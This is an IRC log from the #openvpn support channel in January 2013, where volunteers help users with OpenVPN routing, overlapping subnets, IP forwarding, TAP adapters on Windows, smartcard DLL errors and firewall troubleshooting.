21:25 <+pekster> Yes, I'm mildly annoyed the devs removed that feature in a default installation
21:25 <+pekster> It's not hard to get back, just a hassle for anyone who needs >1 connection for any reason
21:25 < jgspratt1> rob0: ah. the "add a route to the router..." step.
21:26 <+pekster> Not like 2 batch files are a huge strain on the system either. Meh
21:26 < fu_fu> lol
21:26 < jgspratt1> rob0: that's a NAT policy in a SonicWALL, right?
21:27 <+pekster> You shouldn't need NAT unless you don't want (or are unable) to route between the LANs
21:27 <+pekster> Your default gw on the server-side LAN needs to know how to reach the virtual VPN network, otherwise traffic can never get back. Relevant firewalls also need to allow such traffic
21:28 < ngharo> jgspratt1: i think you're looking for "static routes" in a sonicwall
21:28 <+pekster> fu_fu: I don't know about the 32-bit version, but a default 64-bit install of openvpn 2.3.0 provides me with a '\bin\tap-windows.exe' file (same one that's in the installer package at .\$TEMP\tap-windows.exe)
21:29 < fu_fu> pekster, great i will check it out in a few
21:30 < ngharo> pekster: ohh 2.3 has the tap installer stuff back?
21:31 <+pekster> Not really, it just "provides" the installer in the \bin\ path
21:31 <+pekster> I really wish it would give you the stupid utilities
21:31 < ngharo> what good is the installer without the .sys and crap
21:31 <+pekster> No, you get a single TAP-Win32 device
21:32 < ngharo> oh ok, right
21:32 <+pekster> If you want more, or want to run the delete-all batch script, you need to install over itself with that optional feature (ie: the 2 batch scripts) installed. Or copy the batch files over from a 2.2.x install where they were provided by default
21:32 < ngharo> arghh :)
21:32 <+pekster> The actual drivers changed between versions (f.eg: to support IPv6, so you need the new stuff if you want any of the new features.)
21:33 <+pekster> It might be an oversight since the utilities are "optional" - if the nsis script just does a silent "default" install of tap-windows.exe it could be a mistake. Or a way to get you to pay for the non-FOSS version to do "fancy" stuff, I dunno. I couldn't find the .nsi files in a quick look through SVN
21:33 <+pekster> I need to check again and file a bugreport when I can find the files to patch. The project's been split in a couple different github projects. That's ultimately good, but I don't know where half the files are anymore ;)
21:34 < ngharo> yeah i found it on github last i looked
21:34 < ngharo> lemme go find it again
21:34 <+pekster> It's lower priority to me since I have a workaround
21:34 <+pekster> Oh, the .nsi source for the openvpn project? (not tap-windows, since that installer is called *from* the openvpn installation)
21:35 <+pekster> If you have a link handy, I'll definitely take it as it'll save me time hunting. I did a quick trunk checkout and didn't see it in a quick search, so maybe the buildsystem creates it? I don't have the MS VS IDE crap, so that may be non-trivial for me :\
21:35 < ngharo> pekster: ok, nope. You're right. It was the tap-windows one that I saw
21:35 <+pekster> Yea
21:36 <+pekster> I need to dig, because it's not really in the spirit of the GPL to hide key build components like that :\
21:36 <+pekster> Hopefully just an oversight
21:36 < ngharo> yeah, maybe i'll see if I can have a buddy build the msvc project
21:36 <+pekster> But, at least the fix is now sitting nicely in the installed file path ;) As I said earlier, "progress" :D
21:36 < ngharo> see what it spits out
21:37 < ngharo> cheers to progress
21:37 <+pekster> Sure, that'd be cool. If he does, have him zip/tar/xz/whatever the result and post it somewhere
21:37 <+pekster> I'd love to do a file-based diff on source vs completed build
21:37 < ngharo> will do
21:37 <+pekster> I know how Linux/Unix builds work, not so much Windows ;)
21:39 <+pekster> I tried building a small project (just a few source files) and it was designed for the MS VS; there was some crappy command-line "freebie" alternative MSFT provided, and it was a huge pain to build it, bad error messages, etc. And that was just a proof-of-concept exploit I was testing for internal security 2 jobs ago. Apparently not paying for Visual Studio isn't the "right" way to go :(
21:41 < jgspratt1> ngharo: should I get this: pinging from server side to client side: http://hastebin.com/pugicenuta.coffee
21:45 < ngharo> probably not
21:47 < jgspratt1> ngharo: what should I probably see?
21:47 < ngharo> ping reply :)
21:47 <+pekster> Most (securely) configured systems these days won't follow ICMP redirect messages. What is that 10.24.1.1 host? If it's something upstream of the server LAN you likely have a misconfiguration on the LAN's gateway. If it's on the client-side path, maybe the route wasn't pushed?
21:47 <+pekster> Of course, you should already have pushed the route to the client properly if you followed that handy flowchart ;)
21:48 < jgspratt1> yep, the client has the route
21:48 < fu_fu> is this wrong? from the new readme post installation: file locations notice
21:48 < fu_fu> C:\Program Files\OpenVPN\config (32-bit Windows)
21:48 < fu_fu> C:\Program Files (x86)\OpenVPN\config (64-bit Windows)
21:48 < jgspratt1> 10.24.1.1 is the sonicwall
21:49 <+pekster> fu_fu: Looks right for a 32-bit install on a 64-bit installation. I use D:\Apps\ for all my installs, so that's wrong anyway for me ;)
21:49 <+pekster> See the output of the 'set' command in cmd.exe for details
21:50 <+pekster> jgspratt1: Then you need to fix that sonicwall device so it's correctly routing the traffic, not spitting back an icmp-redirect to the source
21:50 < jgspratt1> pekster: if I see "inet addr:10.25.8.1" on the server on the 10.25 side of things, should my route in the sonicwall take 10.0.0 to 10.25.8.1?
21:51 < jgspratt1> Right now, I have the "gateway" for 10.0.0 traffic going to 10.25.8.1
21:51 <+pekster> The route on the server-side LAN's default gw (your sonicwall I think?) needs to route the VPN network via the IP of the VPN server
21:52 < jgspratt1> pekster: which IP of the VPN server?
21:52 <+pekster> The one on the same network segment; gateways are always on your local network
21:53 < jgspratt1> server: http://hastebin.com/bocefawoto.sm
21:53 < jgspratt1> They are both on the same network segment: 10.25
21:53 <+pekster> You can't do that
21:53 < jgspratt1> I'm assuming tun0, but I've been wrong before
21:53 <+pekster> Put your VPN in a non-conflicting IP range
21:53 < jgspratt1> Why not?
21:53 <+pekster> It doesn't work
21:53 <+pekster> !tcpip
21:53 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
21:54 <+pekster> How the heck does the routing table know "which" 10.25.8.1 to use? Is it the VPN IP with that address, or the LAN device?
21:54 < jgspratt1> It won't conflict. I've mapped 10.25.8.0/24 as the VPN.
21:54 <+pekster> Yes, it will, because that network is a *part* of 10.25/16
21:54 <+pekster> Don't do that. That's the reason things are broken
21:55 <+pekster> It's as if you had 2 blocks both called "First" street in a city. Even if one block only goes for 20 feet and has a single house, how does the post office know "which" house to deliver a package to if there are 2 houses both called "500 First Street"?
21:55 < jgspratt1> Ok, my bad. The sonicwall VPN works that way, so I assumed...
21:56 <+pekster> The device didn't do anything; someone configured the VPN and network information to use those addresses ;)
21:56 < jgspratt1> Ok, so the entire east coast IP range is 10.24.0.0 through 10.31.255.255.
21:57 < jgspratt1> What IP range should I assign to the OpenVPN?
21:57 <+pekster> I can't speak to the rest of your setup. Just don't use overlapping networks on any device that is within the routing scope of your usage
21:57 < jgspratt1> How is the sonicwall supposed to know how to route traffic to an IP that isn't on one of its interfaces?
21:58 < jgspratt1> If 10.24.1.101 comes in and asks to go to 10.0.0.10, I need it to go to the OpenVPN somehow.
21:58 <+pekster> By adding a route. That link I had the bot paste above is a good place to start if you don't understand basic TCP/IP routing
21:59 < jgspratt1> Which interface do I put the route's destination on?
21:59 <+pekster> What is 10.0.0.10? The link you showed me isn't the OpenVPN server you're talking about?
22:00 < jgspratt1> Some of the links I showed you were.
22:00 < jgspratt1> 10.0.0.10 is on the 10.0.0.0/24 network: west coast data center
22:00 < jgspratt1> 10.24-10.31 is east coast
22:01 < jgspratt1> I'm trying to bridge the east and west coast datacenters.
22:01 <+pekster> That last link, at http://hastebin.com/bocefawoto.sm, shouldn't be overlapping networks like that. Put your PtP links on a non-conflicting network, and add route statements at either end to route to the range(s) accessible at the opposing end via the IP of the peer
22:01 <+pekster> Besides firewalls, that's all you have to do
22:02 < jgspratt1> What interface should I make the route go to?
22:02 <+pekster> Your tun interface. OpenVPN takes care of that for you
22:02 <+pekster> 'route $remotely_accessible_network $remote_netmask'
22:02 < jgspratt1> On the SONICWALL, X3 for example is 10.25, which is where 10.25.1.101, the physical server hosting the openvpn, is.
22:02 <+pekster> Do that for any ranges you need, and you're done
22:03 < fu_fu> pekster thanks for the addtap help, i'm stoked
22:03 < jgspratt1> Good ol' 10.25.1.102 doesn't know how to get to 10.0.0.10, so he sends packets to his gateway, 10.25.1.1. Which interface should the gateway forward those packets to?
22:03 < fu_fu> are there issues with running TAP links and TUN links with the same windows service?
22:04 <+hazardous> 10.0.0.1?
22:04 < jgspratt1> pekster: those routes are working on the client, exactly.
22:04 < jgspratt1> hazardous: an ip address is not an interface
22:04 <+pekster> The IP is on an interface that the kernel knows about
22:04 <+pekster> You don't route "to an interface"
22:04 <+pekster> You route to an IP that is turned into a L2 MAC address via ARP (at least on Ethernet/TCPIP networks)
22:05 < jgspratt1> In the sonicwall routing, I need to add an interface
22:05 < jgspratt1> and I know for a fact this was working before I moved this datacenter
22:05 <+pekster> Then type 'ifconfig' or 'ip addr show' or whatever sonicwall's command is to show you interfaces and figure out what interface it's on
22:05 <+pekster> It's really not hard
22:06 < jgspratt1> pekster: but I am being told to put the IP of the openvpn server outside of the ranges that are actually on my network.
22:06 <+pekster> Forgive me if this sounds like it's not going anywhere, but you're asking very, very basic networking questions that you should really already know before configuring OpenVPN in a complex network topology like this
22:07 < jgspratt1> Let's use examples. say I use 10.28.1.1 as my openvpn server address, which I haven't used any of yet. How could the sonicwall route to that?
22:08 < fu_fu> show interface info or show interface details
22:08 <+pekster> That's just a virtual address. The device needs a physical address
22:08 <+pekster> You route to the address on the physical link
22:08 < jgspratt1> fu_fu: I know all my interface details by heart.
22:08 < fu_fu> right on
22:08 < jgspratt1> which one do you want to know the details of?
22:09 < fu_fu> i'll stay out of it
22:09 <+pekster> I can't really help you if you don't understand how to identify the local IP of a server on your LAN as the target of a route command
22:09 < jgspratt1> are you serious?
22:09 < jgspratt1> you think I make six figures doing networking and I don't know how to ID an IP?
22:10 <+pekster> "what interface do I use?" Seriously?
22:10 <+pekster> You use the interface of the LAN that that IP is reachable on
22:10 <+pekster> I don't give a crap where you work, how much you make, or where you got your degree. Your server-side LAN's remote gateway needs a route that sends traffic BOUND FOR your remote network ranges *via* your VPN server's IP on that LAN
22:11 < jgspratt1> Makes sense to me, sure. Now, give me an example IP to use for the server that won't conflict.
22:11 <+pekster> Is your network all a subset of 10/8? Just use 172.29.0.1 and 172.29.0.2. Done. Now they don't conflict
22:11 <+pekster> Next problem?
22:12 < jgspratt1> Tell me what rule to write in my sonicwall gateway please
22:12 <+pekster> The gateway where, on the server-side LAN?
22:12 <+pekster> The LAN you're trying to expose?
22:12 < jgspratt1> server-side, east coast
22:12 <+pekster> No clue what 'east coast' is. I've seen a single config file
22:13 < jgspratt1> It's on the 10.25 (X3) network.
22:13 <+pekster> Do you mean how to add a route on 10.25/16's default gateway for the remote network? This 10.0.0.0/24?
22:14 < jgspratt1> Right. I tried saying 10.0/24 goes to 10.25.8.1 on X3, but clearly that was wrong.
22:15 <+pekster> 'ip route add 10.0.0.0/24 via 10.25.1.101'
22:15 <+pekster> That's after you fix your conflicting networks, of course
22:15 < jgspratt1> So, the OpenVPN is accepting packets on its eth0, not its tun?
22:15 <+pekster> The HOST is
22:15 <+pekster> !tcpip
22:15 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
22:16 <+pekster> !101
22:16 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc
22:17 <+pekster> I don't really think it's fair that I'm doing your basic networking homework for your company and not getting paid for it
22:17 < jgspratt1> I assumed tun0, but I've been wrong before
22:21 <+pekster> fu_fu: Sorry, missed your question in this mess. What do you mean running a tun and tap in the same service? You mean having the service start 2 separate configs, one using tun and another tap? Sure, nothing wrong with that at all
22:22 <+pekster> Personally I prefer having more direct control over each process so I can restart/signal them independent of each other, but if you don't need such a feature, the service can manage them both "at once" for you as a master start/stop switch
22:23 < fu_fu> i prefer starting them as a daemon, but i need to be able to logoff and the daemon logs off as well, maybe I should set up some scripts for them or make my own services
22:24 < fu_fu> i like to see the running logs on screen too, wish there was a management interface of some sort, with multiscreens and fancy junk like that
22:25 <+pekster> There is a management interface ;)
22:25 <+pekster> !management
22:25 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN
22:25 <+pekster> You can also just log to a file and read that if you only care about the logs
22:26 <+pekster> Otherwise just use the standard OpenVPN-GUI tool if you want a tray icon that lets you start them as you need and terminates them on logoff
22:26 <+pekster> Or write your own scripts. Plenty of options ;)
22:30 < fu_fu> so the service can start client and server scripts at the same time? just checking before i start a new design
22:30 <+pekster> fu_fu: Yup. See: http://openvpn.net/index.php/open-source/documentation/install.html?start=1
22:30 <@vpnHelper> Title: Installation Notes - Installation (Win32) (at openvpn.net)
22:31 <+pekster> Your 3 basic options are: 1) OpenVPN-GUI, 2) via command line (or an app/script you write that calls the command directly,) or 3) system service
22:31 <+pekster> Each is outlined there
22:34 < jgspratt1> pekster: as much as I try, I still get that redirect host message when pinging.
22:34 < jgspratt1> I'm using your address scheme, but I don't seem to get a reply
22:35 <+pekster> I no longer care. You've clearly made a routing mistake somewhere, which isn't surprising given your prior problems overlapping networks and having problems understanding how routing works
22:35 < jgspratt1> 10.25 -> 10.0 network gets redirect host (sonicwall is saying that), and 10.25 <- 10.0 only goes to 10.25.1.101, not, for example, .102
22:35 < fu_fu> cool thanks, i have read these but i am used to windows lately, they tend to leave out what you can NOT do in the docs. i try to ask my goal specifically for this reason. nothing i have yet seen with a few weeks dealing with OpenVPN indicates the same issue tho. Kudos
22:37 <+pekster> fu_fu: Sure. All 3 systems work, and you can configure them to do what you want. Pick one that seems to best meet your needs, then modify it to suit your specific purpose. No way to launch openvpn is "wrong", but some might be more work for your particular end-goals
22:38 < jgspratt1> Well, for anyone who does care to lend a hand: Here are my routing tables on the client and server: http://hastebin.com/gadalaxelu.vala
22:39 < jgspratt1> I'm trying to get 10.0.0.10 to go to the tun and then to 10.25.1.102 (and then back). I'm afraid that the "and then back" is the problem.
22:39 < jgspratt1> 10.25.1.101 knows to send things "back" to 10.0/24 via its openvpn, but .102 doesn't.
22:40 <@krzee> understand this well:
22:40 <@krzee> !route
22:40 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
22:40 < jgspratt1> I tried to set the Sonicwall to route stuff headed to 10.0/24 to go to the listening 10.25.1.101, where the "local 10.25.1.101" I set.
22:41 < jgspratt1> alright, give me some minutes to read that.
22:45 < jgspratt1> "The answer is iroute!" --this makes sense to me, but I know for a fact (via Github) that this was never in the server.conf file although we are client-to-client.
22:48 < jgspratt1> is the "common name" the hostname? trying to figure out what to call the ccd/ file
22:48 <@krzee> common-name is whatever you made it when making your certs
22:50 < jgspratt1> ah, right
23:01 < jgspratt1> krzee: ok, I setup iroute
23:02 < jgspratt1> http://hastebin.com/rumifebina.hs
23:02 < jgspratt1> That file should be sent to the client.
23:02 < jgspratt1> However, machines on the east coast still cannot get back to the west coast
23:02 <@krzee> !clientlan
23:02 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
23:02 <@krzee> follow the flowchart
23:02 <@krzee> i dont have time to walk you through stuff
23:03 * rob0 follows the flowchart
23:03 < jgspratt1> Right, I saw that chart. I did the step "add a route to the router so it knows how to reach the vpn subnet"
23:03 <@krzee> but i did write !route and made the flowcharts in !clientlan and !serverlan if you understand the basics of routing thats all you should really need
23:03 <@krzee> good luck to ya, i need to go test my new product line :D
23:04 < jgspratt1> The route I wrote was if going to 10.0.0.0/24, go to 10.25.1.101
23:04 < jgspratt1> That's the OpenVPN server eth0, however, no packets can actually make it back.
23:04 <+rob0> are you looking at the flowchart?
23:04 < jgspratt1> Yep!
23:05 < jgspratt1> I have it on my screen right this very moment, sir.
23:06 <+rob0> I don't, but I recall seeing something on it about enabling IP forwarding.
23:07 < jgspratt1> rob0: does http://hastebin.com/vecelijumu.coffee indicate that I'm doing it wrong?
23:12 <+rob0> does that say something about enabling IP forwarding on 10.25.1.101? What OS is 10.25.1.101?
23:13 < jgspratt1> 10.25.1.101 is Ubuntu
23:13 <+rob0> !linipforward
23:13 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
23:13 <+rob0> "cat /proc/sys/net/ipv4/ip_forward"
23:16 < jgspratt1> Ok, I enabled ip forwarding on the openvpn server
23:17 < jgspratt1> I'm still getting a similar problem
23:18 < jgspratt1> Here's the client: http://hastebin.com/moxisolowe.rb
23:21 < jgspratt1> And the server is kind of freaking out route-wise: http://hastebin.com/voviludeho.vhdl
23:23 <@krzee> if you *just* enabled ip forwarding
23:24 <@krzee> after following the flowchart and stating that you enabled a route on the router (which comes after ip forwarding on the flowchart)
23:24 <@krzee> then you basically proved that following directions in order is not your strong suit
23:24 <@krzee> in which case, best of luck to ya dude, i doubt this is for you :-p
23:26 < jgspratt1> Well, you said to enable IP forwarding in my OpenVPN host which is not my firewall
23:26 < jgspratt1> At least, it's not what I call my firewall on a day-to-day basis.
23:26 < jgspratt1> That's what I call my SonicWALL.
23:27 <@krzee> do you know what ip forwarding is / does?
23:27 < jgspratt1> But, fair enough, you suggested to enable it on my Ubuntu machine so I did.
23:28 <@krzee> ip forwarding is needed on any machine that is expected to allow packets to traverse from 1 network device to another
23:28 < jgspratt1> I'm not sure what enabling that does, no, because this was working before I moved datacenters. It doesn't seem to be how this setup is intended to be by the guy who set it up originally.
23:28 <@krzee> whether that means your "ubuntu machine" is up to you to figure out -[
23:28 <@krzee> =]*
23:29 < jgspratt1> Gotcha, so, promiscuous accepting of packets and forwarding them
23:29 <@krzee> promiscuous?
23:29 <@krzee> i think you just mis-used that word, but ok
23:29 < jgspratt1> Fair enough, sure. Anyway, it takes packets and routes them now.
23:30 < jgspratt1> Is it OK that I'm at the "Add a route to the router..." step now?
23:30 <@krzee> no idea
23:30 <@krzee> try starting over and following the directions
23:30 <@krzee> step by step, starting at the top
23:30 < jgspratt1> I'll go from the top, sure.
23:32 < jgspratt1> Yeah, I'm pretty sure I'm in the right spot. I can ping 172.16.0.8, which is the client VPN IP.
23:32 < jgspratt1> I pushed out the routes
23:33 < jgspratt1> I see the iroute config is correct: internal route 10.0.0.0/24 ->
23:33 < jgspratt1> Can I ping the lan IP of the client? no.
23:33 < jgspratt1> Turn on IP forwarding, done.
23:34 < jgspratt1> Can I ping the lan IP of the client? Still no.
23:34 <@krzee> check client firewall
23:34 <@krzee> also check ip forwarding in that firewall
23:34 < jgspratt1> Is my client my firewall also?
23:35 <@krzee> grrr i need one of my users to get around so we can test my shit!
23:35 <+rob0> any Linux machine can have an iptables firewall
23:35 < jgspratt1> Oh, now I see what you mean by firewall here. I was thinking appliance.
23:36 < jgspratt1> Ok, it was already set on the client to forward.
23:44 < jgspratt1> rob0: I'm still stuck with no ping. I've tried many settings.
--- Day changed Wed Jan 09 2013
00:00 < jgspratt1> rob0: now I'm getting this: http://hastebin.com/naxacariku.vbs
00:01 < jgspratt1> so, I can actually get from the east coast to the west coast.
00:01 < jgspratt1> going the opposite way seems to be the problem.
02:22 < Halagan> Hi guys, i have a problem with a Safenet iKey1032 when logging in to vpn with a certificate. We installed the last version of iKey1000SDK (4.2.0) for iKey 1032 under OS Windows 7 x64.
02:22 < Halagan> App installed correctly and the utility shows some information about the token.
02:22 < Halagan> We have an openvpn certificate on this iKey and we use this certificate to login to the vpn site.
02:22 < Halagan> When we run the openvpn client, an error appears with the message “the ordinal 322 could not be located in the dynamic link library libeay32.dll”. So I copied this file and the file ssleay32.dll from windows\system32 to openvpn\bin, where I replaced the original openvpn files. Then i started the openvpn client again, and the openvpn daemon crashed with an error. We use openvpn-2.2.2-install.exe, but I have also tried version openvpn-install-2.3_rc1-I003-x86_64.exe with the same results. Under OS Windows XP 32 bit with iKey1000SDK (4.0.0.4) this certificate on the token works without problems. I tried to install the latest openssl library for 32 and 64 bit OS Windows from the site http://slproweb.com/products/Win32OpenSSL.html, of course i installed the additional recommended library (Visual C++ 2008 Redistributables x32 and x64). Please suggest me a solution. Thanks.
02:25 <+pekster> Halagan: How are you starting OpenVPN? Are you using the OpenVPN GUI from your Windows tray icon? When you install OpenVPN, it uses its own bundled copy of OpenSSL so you don't need to install that separately
02:28 < Halagan> I am starting OpenVPN with config file .ovpn.
02:29 <+pekster> Okay. It sounds like there might be a problem tying the smartcard you're using with the SSL library. I have 2 suggestions: first, try downloading the latest 2.3.0 (just recently released the last couple of days) and see if that changes anything. 2nd, try using the 32-bit version, in case there's some 64/32-bit conflict with your smartcard libraries
02:30 <+pekster> I'm guessing at both of those solutions, but it doesn't sound like an OpenVPN issue, more like an issue interacting with the PKCS11 provider (ie: your smartcard.)
02:30 <+pekster> I assume you've already tested your smartcard on the client software, and it's working normally?
02:33 < Halagan> Under OS Windows XP the client works fine without problems. You mean OpenSSL version 2.3.0 ?
02:33 <+pekster> No, you listed an OpenVPN "rc", or Release Candidate version. The official 2.3.0 version is now available for download
02:33 <+pekster> !download
02:33 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only thing supported here) there is no separate download for client/server, it is the same install with different configs
02:34 <+pekster> If it's working under XP, your smartcard might only work properly with a 32-bit SSL library. You can't just replace the library with the one your smartcard suite uses because OpenVPN is compiled specifically against the version of the dll provided by the installer (ie: you can't just drop in a 32-bit version and expect your 64-bit OpenVPN.exe to work)
02:35 <+pekster> Try the 2.3.0 OpenVPN version for 32-bit, not 64. Completely uninstall your current OpenVPN version, then install that
02:35 <+pekster> It might just work
02:37 < Halagan> Okay, i try it. Thanks. If that does not work, then i'll bother again :-)
02:37 <+pekster> Well, if that doesn't work it's a more subtle (and harder to solve) problem
03:26 < IT> back
03:26 < IT> morning guys
03:40 < IT> @ecrist, major breakthrough, that route correction solved the problem and now i can ping between gateways
03:48 < IT> @ecrist, can't ping other machines behind the gateways though :(
04:42 < IT> i'm stuck at this particular step
http://imagehost.pitestinet.ro/images/m1vdzvvgdwfduni6yi4.png can i have an example of this? 04:46 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 04:55 <@dazo> IT: you need to log into your router ... and add in an explicit route there of your VPN subnet and tell the router to send that traffic to your OpenVPN server's LAN IP 04:56 <@dazo> (that route will be an additional route to whatever you already have there) 04:56 <@dazo> how that is done on your router is out of the scope for this channel, though ... as we don't support routers here, just openvpn setups 04:58 <@dazo> krzee: ... I got an idea for your troubleshoot images .... add a number on each of the blocks ... then it's easier to point at which step people stops at 05:01 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 05:02 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 05:21 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Quit: Leaving] 05:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 05:29 -!- neverme [neverme@177.182.56.94] has joined #openvpn 05:30 < neverme> Hi, I would like to know if its possible to use a single Instance of OpenVPN with multiple public IPs ? Like I want client A to use the outbound IP 1, client B to use IP 2 and so on, or do I have to create 1 VPN to each IP ? 05:39 -!- neverme [neverme@177.182.56.94] has quit [Quit: Leaving] 05:48 < Rienzilla> is possible with one server instance I guess 05:54 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 06:05 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 06:07 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 06:11 < thermoman> why does easyrsa-2.0 create a 01.pem, 02.pem etc besides the name.crt files? 
06:12 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Ping timeout: 248 seconds] 06:18 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 06:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 06:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 06:53 <@ecrist> IT: pastebin another traceroute from one LAN machine to a LAN machine on the other network. 07:04 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 07:08 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 07:09 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 07:10 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Client Quit] 07:11 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 07:15 < IT> ecrist: http://pastebin.com/7gJJfMb2 07:16 <@ecrist> IT: NOW is it a firewall issue? 07:16 < IT> i stopped the firewall ... 07:16 <@ecrist> !iptables 07:16 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just the 07:16 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 07:17 <@ecrist> can you pastebin your configs again? 
07:19 < IT> ofc http://pastebin.com/BUxV6x8X 07:23 < IT> pfff 07:23 < IT> i'm such a retard, i forgot one firewall on LAN2 07:23 <@ecrist> the pastebin above (pings/traceroute) seems to indicate you can only ping from one side to the other, and not both directions 07:23 < IT> it's down, let me retest 07:23 < IT> aaaaaaaand it's working 07:23 <@ecrist> :) 07:23 <+rob0> yay 07:24 < IT> yes! 07:24 < IT> they are all working! :x:X:X:X 07:24 <@ecrist> quoting our /topic: Your problem is probably your firewall, really 07:24 <@ecrist> ;) 07:24 < IT> =)) 07:24 <@ecrist> IT: now, don't you feel better prepared to resolve future issues than if you'd paid someone to do it for you? 07:25 < IT> /respect level +1 for ecrist and rob0 07:25 < IT> hell yea 07:25 < |Mike|> lol 07:25 <@ecrist> !donate 07:25 <@vpnHelper> "donate" is (#1) send monetary donations to openvpn@secure-computing.net via paypal. All money donated goes to staff toward development of the community wiki, forum, and this IRC channel. or (#2) Contributions to this address do *NOT* directly benefit OpenVPN Technologies, Inc. or (#3) http://www.secure-computing.net/wiki/index.php/OpenVPN/Donations for Contribution totals and benefactors 07:25 < IT> took me 3 weeks to solve it, but atleast i got a good glipmse of it 07:29 <@ecrist> glad you got it working, IT 07:30 < IT> ecrist are you part of the staff? 07:30 <@ecrist> yes 07:31 <@ecrist> I run the community services, like IRC, the secure-computing wiki, and community infrastructure 07:31 < |Mike|> now he's going to make your an offer *g* :P 07:31 <@ecrist> I'm also the easy-rsa maintainer 07:32 < IT> check paypal in a few moments 07:32 < IT> thanks again 07:32 <@ecrist> also, feel free to check /msg chanserv info #openvpn 07:33 < IT> you lost me there, i'm a irc noob 07:35 < jgspratt1> Hello, I am having a problem with http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing and http://ircpimps.org/clientlan.png . 
client.conf: http://hastebin.com/qaciwiwugu.vala ; server.conf: http://hastebin.com/papugiroce.vala ; server networking: http://hastebin.com/tacimotaki.sm ; client networking: http://hastebin.com/butabiqore.sm 07:35 <@vpnHelper> Title: OpenVPN/Routing - Secure Computing Wiki (at www.secure-computing.net) 07:35 < jgspratt1> The problem is in the last link: I can't ping 10.25.1.102 from 10.0.0.10 07:36 < jgspratt1> interestingly, on another miscellaneous box on the server-side LAN, I can get to 10.0.0.10: http://hastebin.com/yibefikemo.vhdl 07:36 <@vpnHelper> Title: hastebin (at hastebin.com) 07:37 <@ecrist> IT, type /msg and the rest of that line 07:37 < jgspratt1> (and by "last link" I mean last URL posted) 07:37 < IT> done that :P 07:42 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has joined #openvpn 07:42 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has left #openvpn [] 07:42 < jgspratt1> In fact, the http://ircpimps.org/clientlan.png doesn't seem to cover my problem: I can answer "yes" to all of the questions now, and I get to "it works!" 07:43 < jgspratt1> But, the client can't get respnoses from arbitrary hosts on the server side 07:43 < jgspratt1> Is OpenVPN even able to do that? 07:43 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 07:44 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 07:48 < jgspratt1> Also, I don't understand why traceroute treats 10.25.1.101 and 10.25.1.102 differently in the trace. 07:48 < jgspratt1> http://hastebin.com/lisivovime.rb 07:48 <@vpnHelper> Title: hastebin (at hastebin.com) 08:06 <@ecrist> jgspratt1: firewall? 08:06 < jgspratt1> ecrist: iptables are off and I have included the ip forwarding in both the server and the client. 
